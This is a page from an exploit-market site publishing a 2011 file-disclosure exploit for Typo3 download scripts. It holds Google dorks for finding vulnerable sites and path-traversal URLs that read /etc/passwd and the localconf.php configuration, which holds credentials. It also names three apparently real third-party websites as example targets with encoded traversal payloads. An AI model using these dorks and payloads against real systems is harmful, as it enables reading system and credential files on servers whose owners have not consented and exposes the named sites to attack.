[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Typo3 File Disclosure

Author
Number 7
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16964
Category
web applications
Date add
28-09-2011
Platform
php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Dork : inurl:fileadmin/php/commun/download.php
# Dork : inurl:fileadmin/scripts/download.php
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd
 
http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php

# Exmple :http://www.cndp.fr/fileadmin/php/commun/download.php?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
#  
# Exmple :http://www.epiderm-network.eu/fileadmin/scripts/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
#
# Exmple :http://www.jastram.net/fileadmin/php/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D



#  0day.today [2024-06-25]  #